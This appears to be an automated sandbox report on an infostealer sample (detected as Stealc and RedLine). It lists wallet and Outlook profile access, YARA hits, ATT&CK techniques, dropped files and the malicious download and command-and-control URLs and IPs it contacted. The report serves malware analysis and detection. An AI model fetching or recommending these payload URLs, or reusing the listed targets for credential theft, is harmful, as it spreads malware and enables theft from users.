                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004Jump to behavior
                              Source: Yara matchFile source: 14.2.cmd.exe.5d800c8.7.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 14.2.cmd.exe.5d800c8.7.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 6.2.cmd.exe.60b00c8.8.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 6.2.cmd.exe.60b00c8.8.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 27.2.MSBuild.exe.1370000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0000000E.00000002.2972244441.0000000005D80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000001B.00000002.2968147762.0000000001427000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000001.00000002.2975335845.0000000004383000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000006.00000002.2595395304.00000000060B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: u3bs.0.exe PID: 6808, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 6252, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 6164, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 6176, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 896, type: MEMORYSTR
                              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\bxhlahunbhc, type: DROPPED
                              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\osssciedmed, type: DROPPED

                              Remote Access Functionality

                              barindex
                              Source: Yara matchFile source: 1.3.u3bs.0.exe.42d0000.0.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 1.2.u3bs.0.exe.400000.0.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 1.2.u3bs.0.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 1.3.u3bs.0.exe.42d0000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 1.2.u3bs.0.exe.42a0e67.1.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000001.00000002.2974851008.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000001.00000003.1729816258.00000000042D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 14.2.cmd.exe.5d800c8.7.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 14.2.cmd.exe.5d800c8.7.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 6.2.cmd.exe.60b00c8.8.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 6.2.cmd.exe.60b00c8.8.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0000000E.00000002.2972244441.0000000005D80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000006.00000002.2595395304.00000000060B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 6252, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 6176, type: MEMORYSTR
                              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\bxhlahunbhc, type: DROPPED
                              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\osssciedmed, type: DROPPED
                              Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 6164, type: MEMORYSTR
                              Source: Yara matchFile source: 00000001.00000002.2975335845.000000000432A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: u3bs.0.exe PID: 6808, type: MEMORYSTR
                              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                              Source: Yara matchFile source: dump.pcap, type: PCAP
                              Source: Yara matchFile source: 1.3.u3bs.0.exe.42d0000.0.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 1.2.u3bs.0.exe.400000.0.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 1.2.u3bs.0.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 1.3.u3bs.0.exe.42d0000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 1.2.u3bs.0.exe.42a0e67.1.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000001.00000002.2974851008.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000001.00000003.1729816258.00000000042D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: u3bs.0.exe PID: 6808, type: MEMORYSTR
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_6C7A0C40 sqlite3_bind_zeroblob,1_2_6C7A0C40
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_6C7A0D60 sqlite3_bind_parameter_name,1_2_6C7A0D60
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_6C6C8EA0 sqlite3_clear_bindings,1_2_6C6C8EA0
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_6C7A0B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob,1_2_6C7A0B40
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_6C6C6410 bind,WSAGetLastError,1_2_6C6C6410
                              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                              Gather Victim Identity InformationAcquire InfrastructureValid Accounts211
                              Windows Management Instrumentation
                              11
                              DLL Side-Loading
                              1
                              Abuse Elevation Control Mechanism
                              11
                              Disable or Modify Tools
                              2
                              OS Credential Dumping
                              2
                              System Time Discovery
                              Remote Services11
                              Archive Collected Data
                              13
                              Ingress Tool Transfer
                              Exfiltration Over Other Network MediumAbuse Accessibility Features
                              CredentialsDomainsDefault Accounts11
                              Native API
                              1
                              Windows Service
                              11
                              DLL Side-Loading
                              11
                              Deobfuscate/Decode Files or Information
                              LSASS Memory1
                              Account Discovery
                              Remote Desktop Protocol4
                              Data from Local System
                              21
                              Encrypted Channel
                              Exfiltration Over BluetoothNetwork Denial of Service
                              Email AddressesDNS ServerDomain Accounts2
                              Command and Scripting Interpreter
                              Logon Script (Windows)1
                              Windows Service
                              1
                              Abuse Elevation Control Mechanism
                              Security Account Manager3
                              File and Directory Discovery
                              SMB/Windows Admin Shares1
                              Screen Capture
                              1
                              Non-Standard Port
                              Automated ExfiltrationData Encrypted for Impact
                              Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook312
                              Process Injection
                              3
                              Obfuscated Files or Information
                              NTDS269
                              System Information Discovery
                              Distributed Component Object Model1
                              Email Collection
                              4
                              Non-Application Layer Protocol
                              Traffic DuplicationData Destruction
                              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script21
                              Software Packing
                              LSA Secrets431
                              Security Software Discovery
                              SSHKeylogging115
                              Application Layer Protocol
                              Scheduled TransferData Encrypted for Impact
                              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
                              DLL Side-Loading
                              Cached Domain Credentials341
                              Virtualization/Sandbox Evasion
                              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
                              Masquerading
                              DCSync13
                              Process Discovery
                              Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job341
                              Virtualization/Sandbox Evasion
                              Proc Filesystem1
                              Application Window Discovery
                              Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt312
                              Process Injection
                              /etc/passwd and /etc/shadow1
                              System Owner/User Discovery
                              Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                              Hide Legend

                              Legend:

                              • Process
                              • Signature
                              • Created File
                              • DNS/IP Info
                              • Is Dropped
                              • Is Windows Process
                              • Number of created Registry Values
                              • Number of created Files
                              • Visual Basic
                              • Delphi
                              • Java
                              • .Net C# or VB.NET
                              • C, C++ or other language
                              • Is malicious
                              • Internet
                              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1432428 Sample: TNQTc6Qmkg.exe Startdate: 27/04/2024 Architecture: WINDOWS Score: 100 81 download.iolo.net 2->81 83 svc.iolo.com 2->83 85 4 other IPs or domains 2->85 107 Snort IDS alert for network traffic 2->107 109 Multi AV Scanner detection for domain / URL 2->109 111 Found malware configuration 2->111 113 16 other signatures 2->113 9 TNQTc6Qmkg.exe 3 11 2->9         started        14 run.exe 2->14         started        16 chrome.exe 2->16         started        signatures3 process4 dnsIp5 97 185.172.128.90, 49730, 80 NADYMSS-ASRU Russian Federation 9->97 99 185.172.128.228, 49731, 80 NADYMSS-ASRU Russian Federation 9->99 105 2 other IPs or domains 9->105 73 C:\Users\user\AppData\Local\Temp\u3bs.3.exe, PE32 9->73 dropped 75 C:\Users\user\AppData\Local\Temp\...\run.exe, PE32 9->75 dropped 77 C:\Users\user\AppData\Local\...\relay.dll, PE32 9->77 dropped 79 2 other malicious files 9->79 dropped 137 Detected unpacking (overwrites its own PE header) 9->137 18 u3bs.0.exe 78 9->18         started        23 run.exe 6 9->23         started        25 u3bs.3.exe 9->25         started        27 WerFault.exe 9->27         started        139 Maps a DLL or memory area into another process 14->139 141 Found direct / indirect Syscall (likely to bypass EDR) 14->141 29 cmd.exe 14->29         started        101 192.168.2.4, 443, 49723, 49730 unknown unknown 16->101 103 239.255.255.250 unknown Reserved 16->103 31 chrome.exe 16->31         started        33 chrome.exe 16->33         started        file6 signatures7 process8 dnsIp9 87 185.172.128.76, 49733, 80 NADYMSS-ASRU Russian Federation 18->87 89 185.172.128.203 NADYMSS-ASRU Russian Federation 18->89 57 C:\Users\user\AppData\...\HDBKJEGIEB.exe, PE32 18->57 dropped 59 C:\Users\user\AppData\Local\...\tiktok[1].exe, PE32 18->59 dropped 61 C:\Users\user\AppData\...\softokn3[1].dll, PE32 18->61 dropped 69 11 other files (7 malicious) 18->69 dropped 115 Multi AV Scanner detection for dropped file 18->115 117 Detected unpacking (changes PE section rights) 18->117 119 Detected unpacking (overwrites its own PE header) 18->119 129 9 other signatures 18->129 35 cmd.exe 18->35         started        37 WerFault.exe 18->37         started        63 C:\Users\user\AppData\Roaming\...\relay.dll, PE32 23->63 dropped 65 C:\Users\user\AppData\...\UIxMarketPlugin.dll, PE32 23->65 dropped 121 Maps a DLL or memory area into another process 23->121 123 Found direct / indirect Syscall (likely to bypass EDR) 23->123 39 cmd.exe 4 23->39         started        91 svc.iolo.com 20.157.87.45 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 25->91 125 Checks if the current machine is a virtual machine (disk enumeration) 25->125 67 C:\Users\user\AppData\Local\...\bxhlahunbhc, PE32 29->67 dropped 127 Writes to foreign memory regions 29->127 43 conhost.exe 29->43         started        45 MSBuild.exe 29->45         started        93 www.google.com 142.251.32.100 GOOGLEUS United States 31->93 file10 signatures11 process12 file13 47 HDBKJEGIEB.exe 35->47         started        50 conhost.exe 35->50         started        71 C:\Users\user\AppData\Local\...\osssciedmed, PE32 39->71 dropped 131 Writes to foreign memory regions 39->131 133 Found hidden mapped module (file has been removed from disk) 39->133 135 Maps a DLL or memory area into another process 39->135 52 MSBuild.exe 6 39->52         started        55 conhost.exe 39->55         started        signatures14 process15 dnsIp16 143 Multi AV Scanner detection for dropped file 47->143 95 91.215.85.66 PINDC-ASRU Russian Federation 52->95 145 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 52->145 147 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 52->147 149 Tries to harvest and steal browser information (history, passwords, etc) 52->149 signatures17

                              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                              windows-stand
                              SourceDetectionScannerLabelLink
                              TNQTc6Qmkg.exe47%ReversingLabsWin32.Trojan.Generic
                              TNQTc6Qmkg.exe44%VirustotalBrowse
                              TNQTc6Qmkg.exe100%Joe Sandbox ML
                              SourceDetectionScannerLabelLink
                              C:\Users\user\AppData\Local\Temp\osssciedmed100%AviraHEUR/AGEN.1307453
                              C:\Users\user\AppData\Local\Temp\bxhlahunbhc100%AviraHEUR/AGEN.1307453
                              C:\Users\user\AppData\Local\Temp\osssciedmed100%Joe Sandbox ML
                              C:\Users\user\AppData\Local\Temp\bxhlahunbhc100%Joe Sandbox ML
                              C:\Users\user\AppData\Local\Temp\u3bs.0.exe100%Joe Sandbox ML
                              C:\ProgramData\freebl3.dll0%ReversingLabs
                              C:\ProgramData\freebl3.dll0%VirustotalBrowse
                              C:\ProgramData\mozglue.dll0%ReversingLabs
                              C:\ProgramData\mozglue.dll0%VirustotalBrowse
                              C:\ProgramData\msvcp140.dll0%ReversingLabs
                              C:\ProgramData\msvcp140.dll0%VirustotalBrowse
                              C:\ProgramData\nss3.dll0%ReversingLabs
                              C:\ProgramData\nss3.dll0%VirustotalBrowse
                              C:\ProgramData\softokn3.dll0%ReversingLabs
                              C:\ProgramData\softokn3.dll0%VirustotalBrowse
                              C:\ProgramData\vcruntime140.dll0%ReversingLabs
                              C:\ProgramData\vcruntime140.dll0%VirustotalBrowse
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dll0%ReversingLabs
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dll0%VirustotalBrowse
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mozglue[1].dll0%ReversingLabs
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mozglue[1].dll0%VirustotalBrowse
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dll0%ReversingLabs
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dll0%VirustotalBrowse
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\nss3[1].dll0%ReversingLabs
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\nss3[1].dll0%VirustotalBrowse
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\softokn3[1].dll0%ReversingLabs
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\softokn3[1].dll0%VirustotalBrowse
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\tiktok[1].exe47%ReversingLabsWin32.Spyware.Stealc
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\tiktok[1].exe72%VirustotalBrowse
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\vcruntime140[1].dll0%ReversingLabs
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\vcruntime140[1].dll0%VirustotalBrowse
                              C:\Users\user\AppData\Local\Temp\HDBKJEGIEB.exe47%ReversingLabsWin32.Spyware.Stealc
                              C:\Users\user\AppData\Local\Temp\HDBKJEGIEB.exe72%VirustotalBrowse
                              C:\Users\user\AppData\Local\Temp\bxhlahunbhc65%ReversingLabsByteCode-MSIL.Trojan.RedLine
                              C:\Users\user\AppData\Local\Temp\bxhlahunbhc61%VirustotalBrowse
                              C:\Users\user\AppData\Local\Temp\osssciedmed65%ReversingLabsByteCode-MSIL.Trojan.RedLine
                              C:\Users\user\AppData\Local\Temp\osssciedmed61%VirustotalBrowse
                              C:\Users\user\AppData\Local\Temp\u3bs.0.exe39%VirustotalBrowse
                              C:\Users\user\AppData\Local\Temp\u3bs.2\UIxMarketPlugin.dll18%ReversingLabsWin32.Trojan.Generic
                              C:\Users\user\AppData\Local\Temp\u3bs.2\UIxMarketPlugin.dll13%VirustotalBrowse
                              C:\Users\user\AppData\Local\Temp\u3bs.2\relay.dll0%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\u3bs.2\relay.dll0%VirustotalBrowse
                              C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe0%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe0%VirustotalBrowse
                              C:\Users\user\AppData\Local\Temp\u3bs.3.exe4%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\u3bs.3.exe3%VirustotalBrowse
                              No Antivirus matches
                              SourceDetectionScannerLabelLink
                              note.padd.cn.com1%VirustotalBrowse
                              fp2e7a.wpc.phicdn.net0%VirustotalBrowse
                              download.iolo.net0%VirustotalBrowse
                              SourceDetectionScannerLabelLink
                              http://ocsp.sectigo.com00%URL Reputationsafe
                              http://www.indyproject.org/0%URL Reputationsafe
                              https://sectigo.com/CPS0D0%URL Reputationsafe
                              https://mozilla.org0/0%URL Reputationsafe
                              http://ocsp.thawte.com00%URL Reputationsafe
                              http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t0%URL Reputationsafe
                              http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#0%URL Reputationsafe
                              http://185.172.128.203/tiktok.exe100%Avira URL Cloudmalware
                              http://185.172.128.76/15f649199f40275b/nss3.dll0%Avira URL Cloudsafe
                              http://185.172.128.228/BroomSetup.exe0%Avira URL Cloudsafe
                              http://185.172.128.203/tiktok.exe000%Avira URL Cloudsafe
                              http://185.172.128.76/15f649199f40275b/mozglue.dll0%Avira URL Cloudsafe
                              185.172.128.76/3cd2b41cbde8fc9c.php0%Avira URL Cloudsafe
                              http://185.172.128.76/3cd2b41cbde8fc9c.php0%Avira URL Cloudsafe
                              http://185.172.128.228/ping.php?substr=eight100%Avira URL Cloudmalware
                              http://185.172.128.228/BroomSetup.exe23%VirustotalBrowse
                              http://185.172.128.76/15f649199f40275b/nss3.dll0%VirustotalBrowse
                              http://185.172.128.76/15f649199f40275b/sqlite3.dll#0%Avira URL Cloudsafe
                              http://185.172.128.76/15f649199f40275b/mozglue.dll0%VirustotalBrowse
                              185.172.128.76/3cd2b41cbde8fc9c.php16%VirustotalBrowse
                              http://185.172.128.228/ping.php?substr=eight18%VirustotalBrowse
                              http://185.172.128.76/15f649199f40275b/msvcp140.dllQ0%Avira URL Cloudsafe
                              http://185.172.128.203/tiktok.exe20%VirustotalBrowse
                              http://185.172.128.76/15f649199f40275b/msvcp140.dll0%Avira URL Cloudsafe
                              http://185.172.128.76/15f649199f40275b/sqlite3.dll0%Avira URL Cloudsafe
                              http://note.padd.cn.com/1/Package.zip0%Avira URL Cloudsafe
                              http://185.172.128.76/15f649199f40275b/sqlite3.dll#9%VirustotalBrowse
                              http://185.172.128.203/tiktok.exe0015%VirustotalBrowse
                              http://185.172.128.76/15f649199f40275b/sqlite3.dll9%VirustotalBrowse
                              http://note.padd.cn.com/1/Package.zip3%VirustotalBrowse
                              http://185.172.128.76/3cd2b41cbde8fc9c.php16%VirustotalBrowse
                              http://185.172.128.76/15f649199f40275b/freebl3.dllc0%Avira URL Cloudsafe
                              http://185.172.128.76/15f649199f40275b/msvcp140.dll0%VirustotalBrowse
                              http://185.172.128.76/15f649199f40275b/nss3.dllr0%Avira URL Cloudsafe
                              http://185.172.128.76/3cd2b41cbde8fc9c.phpb530a5706ea79088c3d36b56fcb77release4d62687a42cd9519ca69bf0%Avira URL Cloudsafe
                              http://185.172.128.76/3cd2b41cbde8fc9c.phpt0%Avira URL Cloudsafe
                              http://185.172.128.76/15f649199f40275b/softokn3.dll0%Avira URL Cloudsafe
                              http://185.172.128.76/15f649199f40275b/msvcp140.dllQ7%VirustotalBrowse
                              https://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exe.0%Avira URL Cloudsafe
                              http://185.172.128.59/syncUpd.exe100%Avira URL Cloudmalware
                              http://185.172.128.76/15f649199f40275b/vcruntime140.dll)0%Avira URL Cloudsafe
                              http://185.172.128.76/15f649199f40275b/freebl3.dll0%Avira URL Cloudsafe
                              https://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exebbC0%Avira URL Cloudsafe
                              http://185.172.128.76/3cd2b41cbde8fc9c.phpt3%VirustotalBrowse
                              http://185.172.128.90/cpa/ping.php?substr=eight&s=ab&sub=0100%Avira URL Cloudmalware
                              http://185.172.128.59/syncUpd.exe23%VirustotalBrowse
                              http://185.172.128.76/15f649199f40275b/freebl3.dll0%VirustotalBrowse
                              https://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exe0%Avira URL Cloudsafe
                              http://185.172.128.203/tiktok.exet-Disposition:0%Avira URL Cloudsafe
                              http://185.172.128.76/15f649199f40275b/vcruntime140.dll0%Avira URL Cloudsafe
                              http://185.172.128.203/tiktok.exe&0%Avira URL Cloudsafe
                              http://download.iolo.net0%Avira URL Cloudsafe
                              https://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exe.0%VirustotalBrowse
                              https://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exe.6-0%Avira URL Cloudsafe
                              http://185.172.128.76/15f649199f40275b/softokn3.dll0%VirustotalBrowse
                              http://185.172.128.90/cpa/ping.php?substr=eight&s=ab&sub=021%VirustotalBrowse
                              https://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exe1%VirustotalBrowse
                              http://185.172.128.203/tiktok.exet-Disposition:15%VirustotalBrowse
                              http://185.172.128.760%Avira URL Cloudsafe
                              http://185.172.128.76/15f649199f40275b/vcruntime140.dll:0%Avira URL Cloudsafe
                              http://185.172.128.76/15f649199f40275b/nss3.dllb0%Avira URL Cloudsafe
                              http://185.172.128.76/15f649199f40275b/vcruntime140.dll0%VirustotalBrowse
                              http://185.172.128.7614%VirustotalBrowse
                              http://185.172.128.76/15f649199f40275b/nss3.dllb3%VirustotalBrowse
                              http://download.iolo.net0%VirustotalBrowse
                              NameIPActiveMaliciousAntivirus DetectionReputation
                              www.google.com
                              142.251.32.100
                              truefalse
                                high
                                iolo0.b-cdn.net
                                169.150.236.99
                                truefalse
                                  high
                                  note.padd.cn.com
                                  176.97.76.106
                                  truefalseunknown
                                  svc.iolo.com
                                  20.157.87.45
                                  truefalse
                                    high
                                    fp2e7a.wpc.phicdn.net
                                    192.229.211.108
                                    truefalseunknown
                                    download.iolo.net
                                    unknown
                                    unknowntrueunknown
                                    NameMaliciousAntivirus DetectionReputation
                                    http://185.172.128.228/BroomSetup.exefalse
                                    • 23%, Virustotal, Browse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://185.172.128.76/15f649199f40275b/nss3.dlltrue
                                    • 0%, Virustotal, Browse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://westus2-2.in.applicationinsights.azure.com/v2/trackfalse
                                      high
                                      http://185.172.128.76/15f649199f40275b/mozglue.dlltrue
                                      • 0%, Virustotal, Browse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://185.172.128.203/tiktok.exefalse
                                      • 20%, Virustotal, Browse
                                      • Avira URL Cloud: malware
                                      unknown
                                      185.172.128.76/3cd2b41cbde8fc9c.phptrue
                                      • 16%, Virustotal, Browse
                                      • Avira URL Cloud: safe
                                      low
                                      http://185.172.128.76/3cd2b41cbde8fc9c.phptrue
                                      • 16%, Virustotal, Browse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://185.172.128.228/ping.php?substr=eightfalse
                                      • 18%, Virustotal, Browse
                                      • Avira URL Cloud: malware
                                      unknown
                                      https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgSaEMC5GMCJsbEGIjDQUM1XksqiVK7TvDJ-VWO8_5g4InGTtoS9EM--2kh8-SXh1FoYbI9aSPEi5GAatgQyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUMfalse
                                        high
                                        http://185.172.128.76/15f649199f40275b/msvcp140.dlltrue
                                        • 0%, Virustotal, Browse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0false
                                          high
                                          http://svc.iolo.com/__svc/sbv/DownloadManager.ashxfalse
                                            high
                                            http://185.172.128.76/15f649199f40275b/sqlite3.dlltrue
                                            • 9%, Virustotal, Browse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://note.padd.cn.com/1/Package.zipfalse
                                            • 3%, Virustotal, Browse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://www.google.com/async/newtab_promosfalse
                                              high
                                              http://185.172.128.76/15f649199f40275b/softokn3.dlltrue
                                              • 0%, Virustotal, Browse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://185.172.128.59/syncUpd.exefalse
                                              • 23%, Virustotal, Browse
                                              • Avira URL Cloud: malware
                                              unknown
                                              https://www.google.com/async/ddljson?async=ntp:2false
                                                high
                                                https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgwfalse
                                                  high
                                                  http://185.172.128.76/15f649199f40275b/freebl3.dlltrue
                                                  • 0%, Virustotal, Browse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://185.172.128.90/cpa/ping.php?substr=eight&s=ab&sub=0true
                                                  • 21%, Virustotal, Browse
                                                  • Avira URL Cloud: malware
                                                  unknown
                                                  https://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exefalse
                                                  • 1%, Virustotal, Browse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://185.172.128.76/15f649199f40275b/vcruntime140.dlltrue
                                                  • 0%, Virustotal, Browse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  NameSourceMaliciousAntivirus DetectionReputation
